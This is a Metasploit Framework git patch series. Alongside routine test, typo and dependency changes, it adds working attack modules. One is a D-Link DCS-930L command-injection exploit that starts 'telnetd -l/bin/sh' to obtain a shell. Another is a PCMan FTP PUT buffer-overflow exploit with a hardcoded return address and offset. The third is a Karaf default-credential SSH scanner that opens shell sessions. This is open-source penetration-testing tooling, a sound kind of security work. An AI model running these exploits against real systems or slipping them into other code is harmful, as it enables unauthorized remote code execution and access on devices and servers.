information' do - expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_2) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - it 'should delete any pre-existing load errors from module_manager.module_load_error_by_path' do - original_load_error = "Back in my day this module didn't load" - module_manager.module_load_error_by_path[module_path] = original_load_error - - expect(module_manager.module_load_error_by_path[module_path]).to eq original_load_error - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - expect(module_manager.module_load_error_by_path[module_path]).to be_nil - end - - it 'should return true' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - it 'should call module_manager.on_module_load' do - expect(module_manager).to receive(:on_module_load) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - context 'with :recalculate_by_type' do - it 'should set the type to be recalculated' do - recalculate_by_type = {} - - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :recalculate_by_type => recalculate_by_type - ) - ).to eq true - expect(recalculate_by_type[type]).to be_truthy - end - end - - context 'with :count_by_type' do - it 'should set the count to 1 if it does not exist' do - count_by_type = {} - - expect(count_by_type.has_key?(type)).to be_falsey - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :count_by_type => count_by_type - ) - ).to eq true - expect(count_by_type[type]).to eq 1 - end - - it 'should increment the count if it does exist' do - original_count = 1 - count_by_type = { - type => original_count - } - - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :count_by_type => count_by_type - ) - ).to eq true - - incremented_count = original_count + 1 - expect(count_by_type[type]).to eq incremented_count - end - end - end + incremented_count = original_count + 1 + expect(count_by_type[type]).to eq incremented_count end end end @@ -944,7 +782,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit3 + class Metasploit end end @@ -1239,7 +1077,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod0 - class Metasploit3 + class Metasploit end end @@ -1339,50 +1177,5 @@ RSpec.describe Msf::Modules::Loader::Base do subject.send(:typed_path, type, module_reference_name) end end - - context '#usable?' do - context 'without metasploit_class responding to is_usable' do - it 'should return true' do - metasploit_class = double('Metasploit Class') - expect(metasploit_class).not_to respond_to(:is_usable) - - expect(subject.send(:usable?, metasploit_class)).to be_truthy - end - end - - context 'with metasploit_class responding to is_usable' do - it 'should delegate to metasploit_class.is_usable' do - # not a proper return, but guarantees that delegation is actually happening - usability = 'maybe' - metasploit_class = double('Metasploit Class', :is_usable => usability) - - expect(subject.send(:usable?, metasploit_class)).to eq usability - end - - context 'with error from metasploit_class.is_usable' do - let(:error) do - 'Expected error' - end - - let(:metasploit_class) do - metasploit_class = double('Metasploit Class') - - expect(metasploit_class).to receive(:is_usable).and_raise(error) - - metasploit_class - end - - it 'should log error' do - expect(subject).to receive(:elog).with(/#{error}/) - - subject.send(:usable?, metasploit_class) - end - - it 'should return false' do - expect(subject.send(:usable?, metasploit_class)).to be_falsey - end - end - end - end end end From 8c8cdd9912c690485c1a871688e9eb4358c49934 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sat, 23 Jan 2016 11:15:23 -0600 Subject: [PATCH 224/686] Adding Dlink DCS Authenticated RCE Module This module takes advantage of an authenticated HTTP RCE vulnerability to start telnet on a random port. The module then connects to that telnet session and returns a shell. This vulnerability is present in version 2.01 of the firmware and resolved by version 2.12. --- ..._authenticated_remote_command_execution.rb | 170 ++++++++++++++++++ 1 file changed, 170 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb new file mode 100644 index 0000000000..3b1a7b690b --- /dev/null +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -0,0 +1,170 @@ +## +## This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::Telnet + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DCS-930L Authenticated Remote Command Execution', + 'Description' => %q{ + The D-Link DCS-930L Network Video Camera is vulnerable + to OS Command Injection via the web interface. The vulnerability + exists at /setSystemCommand, which is accessible with credentials. + This vulnerability was present in firmware version 2.01 and fixed + by 2.12. + }, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'December 20 2015', + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', '']) + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def telnet_timeout + (datastore['TelnetTimeout'] || 10).to_i + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i + end + + def exploit + print_status('Exploiting') + user = datastore['USERNAME'] + if datastore['PASSWORD'].nil? + pass = "" + else + pass = datastore['PASSWORD'] + end + test_login(user, pass) + exploit_telnet + end + + def test_login(user, pass) + print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user, pass) + }) + + if res.nil? + fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to web service - no response") + end + + if (res.code != 200) + fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to web service - invalid credentials (response code: #{res.code}") + else + print_good("#{rhost}:#{rport} - Successful login #{user} / #{pass}") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the web service") + end + end + + def exploit_telnet + telnet_port = rand(32767) + 32768 + + print_status("#{rhost}:#{rport} - Telnet Port: #{telnet_port}") + + cmd = "telnetd -p #{telnet_port} -l/bin/sh" + + telnet_request(cmd) + + print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...") + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 0 }) + + if sock.nil? + fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor servie unreachable") + end + + add_socket(sock) + + print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...") + prompt = negotiate_telnet(sock) + + if prompt.nil? + sock.close + fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{telnet_port} - Telnet session successfully established") + end + + handler(sock) + end + + def telnet_request(cmd) + uri = '/setSystemCommand' + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'vars_post' => { + 'ReplySuccessPage' => 'docmd.htm', + 'ReplyErrorPage' => 'docmd.htm', + 'SystemCommand' => cmd, + 'ConfigSystemCommand' => 'Save' + } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the web service") + end + end + + def negotiate_telnet(sock) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, telnet_timeout) + return nil if not data or data.length == 0 + if data =~ /BusyBox/ + return true + end + end + end + rescue ::Timeout::Error + return nil + end + end +end From a5a2e7c06b7db21babe1bbcb54f18697d372f9b7 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sat, 23 Jan 2016 11:41:05 -0600 Subject: [PATCH 225/686] Fixing Disclosure Date Disclosure date was in incorrect format, this commit fixes the issue --- .../dlink_dcs_930l_authenticated_remote_command_execution.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 3b1a7b690b..b2e6c1e816 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Nicholas Starke ' ], 'License' => MSF_LICENSE, - 'DisclosureDate' => 'December 20 2015', + 'DisclosureDate' => 'Dec 20 2015', 'Privileged' => true, 'Platform' => 'unix', 'Arch' => ARCH_CMD, From d877522ea52a3f59b198fd1e5d79f9c006cec518 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sat, 23 Jan 2016 13:43:09 -0600 Subject: [PATCH 226/686] Fixing various issues from comments This commit fixes issues with specifying "rhost:rport", replacing them instead with "peer". Also, a couple of "Unknown" errors were replaced with "UnexpectedReply". --- ..._930l_authenticated_remote_command_execution.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index b2e6c1e816..ce80caa726 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote end def test_login(user, pass) - print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + print_status("#{peer} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => '/', @@ -87,23 +87,23 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to web service - no response") + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") end if (res.code != 200) - fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to web service - invalid credentials (response code: #{res.code}") + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") else - print_good("#{rhost}:#{rport} - Successful login #{user} / #{pass}") + print_good("#{peer} - Successful login #{user} / #{pass}") end rescue ::Rex::ConnectionError - fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the web service") + fail_with(Failure::Unknown, "#{peer} - Could not connect to the web service") end end def exploit_telnet telnet_port = rand(32767) + 32768 - print_status("#{rhost}:#{rport} - Telnet Port: #{telnet_port}") + print_status("#{peer} - Telnet Port: #{telnet_port}") cmd = "telnetd -p #{telnet_port} -l/bin/sh" @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the web service") + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end From 4560d553b5dc42c273652d6f3e44342aafd701a5 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sun, 24 Jan 2016 19:43:02 -0600 Subject: [PATCH 227/686] Fixing more issues from comments This commit includes more minor fixes from the github comments for this PR. --- ..._authenticated_remote_command_execution.rb | 40 +++++++------------ 1 file changed, 14 insertions(+), 26 deletions(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index ce80caa726..848bad21e9 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -58,46 +58,34 @@ class Metasploit3 < Msf::Exploit::Remote end def telnet_timeout - (datastore['TelnetTimeout'] || 10).to_i + (datastore['TelnetTimeout'] || 10) end def banner_timeout - (datastore['TelnetBannerTimeout'] || 25).to_i + (datastore['TelnetBannerTimeout'] || 25) end def exploit - print_status('Exploiting') user = datastore['USERNAME'] - if datastore['PASSWORD'].nil? - pass = "" - else - pass = datastore['PASSWORD'] - end + pass = datastore['PASSWORD'] || '' + test_login(user, pass) exploit_telnet end def test_login(user, pass) print_status("#{peer} - Trying to login with #{user} / #{pass}") - begin - res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'authorization' => basic_auth(user, pass) - }) - if res.nil? - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") - end + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user, pass) + }) - if (res.code != 200) - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") - else - print_good("#{peer} - Successful login #{user} / #{pass}") - end - rescue ::Rex::ConnectionError - fail_with(Failure::Unknown, "#{peer} - Could not connect to the web service") - end + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200 + + print_good("#{peer} - Successful login #{user} / #{pass}") end def exploit_telnet @@ -111,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...") ctx = { 'Msf' => framework, 'MsfExploit' => self } - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 0 }) + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout }) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor servie unreachable") From 0134161c1ba46e11a760ced9f3024e617d05b22a Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 25 Jan 2016 22:15:13 +1000 Subject: [PATCH 228/686] Fix another typo --- lib/rex/post/meterpreter/packet.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 36ae8e8ed8..372324381f 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -693,7 +693,7 @@ class Packet < GroupTlv end # - # Xora set of bytes with a given DWORD xor key. + # Xor a set of bytes with a given DWORD xor key. # def xor_bytes(xor_key, bytes) result = '' From 69d9ff7958a636a6c05c855501cd9d10fe881d85 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 25 Jan 2016 22:32:20 +1000 Subject: [PATCH 229/686] Add an extended mode to the session list --- lib/msf/base/serializer/readable_text.rb | 12 +++++- lib/msf/ui/console/command_dispatcher/core.rb | 42 ++++++++++--------- 2 files changed, 34 insertions(+), 20 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index e912cbb6f5..5b20981a9c 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -524,6 +524,7 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false + extended = opts[:extended] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap @@ -536,6 +537,7 @@ class ReadableText 'Information', 'Connection' ] + columns << 'Checkin?' if extended tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -552,10 +554,18 @@ class ReadableText end row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ] - if session.respond_to? :platform + if session.respond_to?(:platform) row[1] << (" " + session.platform) end + if extended + if session.respond_to?(:last_checkin) && session.last_checkin + row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" + else + row << '?' + end + end + tbl << row } diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index c76bd76923..e129744ff3 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -34,18 +34,19 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( - "-c" => [ true, "Run a command on the session given with -i, or all"], - "-h" => [ false, "Help banner" ], - "-i" => [ true, "Interact with the supplied session ID" ], - "-l" => [ false, "List all active sessions" ], - "-v" => [ false, "List verbose fields" ], - "-q" => [ false, "Quiet mode" ], - "-k" => [ true, "Terminate sessions by session ID and/or range" ], - "-K" => [ false, "Terminate all sessions" ], - "-s" => [ true, "Run a script on the session given with -i, or all"], - "-r" => [ false, "Reset the ring buffer for the session given with -i, or all"], - "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], - "-t" => [ true, "Set a response timeout (default: 15)"]) + "-c" => [ true, "Run a command on the session given with -i, or all" ], + "-h" => [ false, "Help banner" ], + "-i" => [ true, "Interact with the supplied session ID " ], + "-l" => [ false, "List all active sessions" ], + "-v" => [ false, "List extended fields" ], + "-vv" => [ false, "Render in verbose mode" ], + "-q" => [ false, "Quiet mode" ], + "-k" => [ true, "Terminate sessions by session ID and/or range" ], + "-K" => [ false, "Terminate all sessions" ], + "-s" => [ true, "Run a script on the session given with -i, or all" ], + "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], + "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], + "-t" => [ true, "Set a response timeout (default: 15)" ]) @@jobs_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], @@ -1757,12 +1758,13 @@ class Core # def cmd_sessions(*args) begin - method = nil - quiet = false - verbose = false - sid = nil - cmds = [] - script = nil + method = nil + quiet = false + extended = false + verbose = false + sid = nil + cmds = [] + script = nil reset_ring = false response_timeout = 15 @@ -1780,6 +1782,8 @@ class Core method = 'cmd' cmds << val if val when "-v" + extended = true + when "-vv" verbose = true # Do something with the supplied session identifier instead of # all sessions. @@ -2041,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :extended => extended, :verbose => verbose)) print_line end From 3cab27086fcd0019ee176ce7274c81176e858bb7 Mon Sep 17 00:00:00 2001 From: Chris Higgins Date: Tue, 26 Jan 2016 17:09:31 -0600 Subject: [PATCH 230/686] Added PCMan FTP PUT Buffer Overflow Exploit --- modules/exploits/windows/ftp/pcman_put.rb | 80 +++++++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 modules/exploits/windows/ftp/pcman_put.rb diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb new file mode 100644 index 0000000000..6ec62b9471 --- /dev/null +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -0,0 +1,80 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PCMAN FTP Server v2.0.7 Buffer Overflow - PUT Command', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in the PUT command of the + PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous + credientials are enabled. + }, + 'Author' => + [ + 'Jay Turla @shipcod3', # Initial Discovery + 'Chris Higgins @ch1gg1ns' # msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '37731'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'VERBOSE' => true + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0A\x0D", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 English', + { + 'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll + 'Offset' => 2007 + } + ], + ], + 'DisclosureDate' => 'Aug 07 2015', + 'DefaultTarget' => 0)) + end + + def check + connect_login + disconnect + + if /220 PCMan's FTP Server 2\.0/ === banner + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + + def exploit + connect_login + + print_status('Generating payload...') + sploit = rand_text_alpha(target['Offset']) + sploit << [target.ret].pack('V') + sploit << make_nops(16) + sploit << payload.encoded + + send_cmd( ["PUT", sploit], false ) + disconnect + end + +end From 2df458c359b78a3663c7abffe1076c569fa1f37c Mon Sep 17 00:00:00 2001 From: Chris Higgins Date: Tue, 26 Jan 2016 23:19:18 -0600 Subject: [PATCH 231/686] Few updates per OJ and wvu --- modules/exploits/windows/ftp/pcman_put.rb | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb index 6ec62b9471..7062af3f5b 100644 --- a/modules/exploits/windows/ftp/pcman_put.rb +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -5,14 +5,14 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, - 'Name' => 'PCMAN FTP Server v2.0.7 Buffer Overflow - PUT Command', + 'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command', 'Description' => %q{ This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous @@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ - 'Jay Turla @shipcod3', # Initial Discovery - 'Chris Higgins @ch1gg1ns' # msf Module + 'Jay Turla', # Initial Discovery -- @shipcod3 + 'Chris Higgins' # msf Module -- @ch1gg1ns ], 'License' => MSF_LICENSE, 'References' => @@ -30,8 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'process', - 'VERBOSE' => true + 'EXITFUNC' => 'process' }, 'Payload' => { @@ -57,9 +56,9 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if /220 PCMan's FTP Server 2\.0/ === banner - return Exploit::CheckCode::Appears + Exploit::CheckCode::Appears else - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end end From 115c63e4baed8b787013fb16735fff0837d372e3 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 23 Oct 2015 14:32:35 -0700 Subject: [PATCH 232/686] karaf default credential scanner PoC --- modules/auxiliary/scanner/karaf/login.rb | 156 +++++++++++++++++++++++ 1 file changed, 156 insertions(+) create mode 100644 modules/auxiliary/scanner/karaf/login.rb diff --git a/modules/auxiliary/scanner/karaf/login.rb b/modules/auxiliary/scanner/karaf/login.rb new file mode 100644 index 0000000000..8eee64e9e0 --- /dev/null +++ b/modules/auxiliary/scanner/karaf/login.rb @@ -0,0 +1,156 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' +require 'metasploit/framework/login_scanner/ssh' +require 'metasploit/framework/credential_collection' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Auxiliary::CommandShell + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Karaf Default Credential Scanner', + 'Description' => %q{ + TODO + }, + 'Author' => ['TODO'], + # 'References' => + # [ + # [ 'CVE', '1999-0502'] # Weak password + # ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + # TODO Set default user, pass + Opt::RPORT(8101), + OptString.new('USERNAME', [true, 'Username', 'karaf']), + OptString.new('PASSWORD', [true, 'Password', 'karaf']) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('STOP_ON_SUCCESS', [ false, '', true]), + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + def rport + datastore['RPORT'] + end + + def session_setup(result, ssh_socket) + return unless ssh_socket + + # Create a new session + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + + merge_me = { + 'USERNAME' => result.credential.public, + 'PASSWORD' => result.credential.private + } + info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{datastore['RPORT']})" + s = start_session(self, info, merge_me, false, conn.lsock) + + # Set the session platform + case result.proof + when /Linux/ + s.platform = "linux" + when /Darwin/ + s.platform = "osx" + when /SunOS/ + s.platform = "solaris" + when /BSD/ + s.platform = "bsd" + when /HP-UX/ + s.platform = "hpux" + when /AIX/ + s.platform = "aix" + when /Win32|Windows/ + s.platform = "windows" + when /Unknown command or computer name/ + s.platform = "cisco-ios" + end + + s + end + + def gather_proof + proof = '' + begin + Timeout.timeout(5) do + proof = ssh_socket.exec!("shell:info\n").to_s + end + rescue ::Exception + end + proof + end + + def run_host(ip) + @ip = ip + print_status("Attempting login to #{ip}:#{rport}...") + + cred_collection = Metasploit::Framework::CredentialCollection.new( + password: datastore['PASSWORD'], + username: datastore['USERNAME'] + ) + + scanner = Metasploit::Framework::LoginScanner::SSH.new( + host: ip, + port: rport, + cred_details: cred_collection, + proxies: datastore['Proxies'], + stop_on_success: datastore['STOP_ON_SUCCESS'], + connection_timeout: datastore['SSH_TIMEOUT'], + framework: framework, + framework_module: self, + ) + + scanner.scan! do |result| + credential_data = result.to_h + credential_data.merge!( + module_fullname: self.fullname, + workspace_id: myworkspace_id + ) + case result.status + when Metasploit::Model::Login::Status::SUCCESSFUL + print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}')" + credential_core = create_credential(credential_data) + credential_data[:core] = credential_core + create_credential_login(credential_data) + session_setup(result, scanner.ssh_socket) + :next_user + when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT + if datastore['VERBOSE'] + print_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}" + end + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? + invalidate_login(credential_data) + :abort + when Metasploit::Model::Login::Status::INCORRECT + if datastore['VERBOSE'] + print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'" + end + invalidate_login(credential_data) + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? + else + invalidate_login(credential_data) + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? + end + end + end +end From 1ef7aef9969de70c9630ed13bb691622602834d8 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Wed, 27 Jan 2016 17:20:58 -0600 Subject: [PATCH 233/686] Fixing User : Pass delimiter As per the PR comments, this commit replaces the user and pass delimiter from "/" to ":" --- .../dlink_dcs_930l_authenticated_remote_command_execution.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 848bad21e9..2e1fab9064 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote end def test_login(user, pass) - print_status("#{peer} - Trying to login with #{user} / #{pass}") + print_status("#{peer} - Trying to login with #{user} : #{pass}") res = send_request_cgi({ 'uri' => '/', @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200 - print_good("#{peer} - Successful login #{user} / #{pass}") + print_good("#{peer} - Successful login #{user} : #{pass}") end def exploit_telnet From 2fe40a0e046f00b7bda7afb66d84e02fb124531f Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 28 Jan 2016 11:27:56 -0600 Subject: [PATCH 234/686] Bump jsobfu version to 0.4.1 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 9de4465f33..168f5b10e0 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -7,7 +7,7 @@ PATH activesupport (>= 4.0.9, < 4.1.0) bcrypt filesize - jsobfu (~> 0.3.0) + jsobfu (~> 0.4.1) json metasm (~> 1.0.2) metasploit-concern (= 1.0.0) @@ -102,7 +102,7 @@ GEM multi_json (~> 1.3) hike (1.2.3) i18n (0.7.0) - jsobfu (0.3.0) + jsobfu (0.4.1) rkelly-remix (= 0.0.6) json (1.8.3) mail (2.6.3) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 104d24fbf7..17b4e295a4 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -55,7 +55,7 @@ Gem::Specification.new do |spec| # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) spec.add_runtime_dependency 'bcrypt' # Needed for Javascript obfuscation - spec.add_runtime_dependency 'jsobfu', '~> 0.3.0' + spec.add_runtime_dependency 'jsobfu', '~> 0.4.1' # Needed for some admin modules (scrutinizer_add_user.rb) spec.add_runtime_dependency 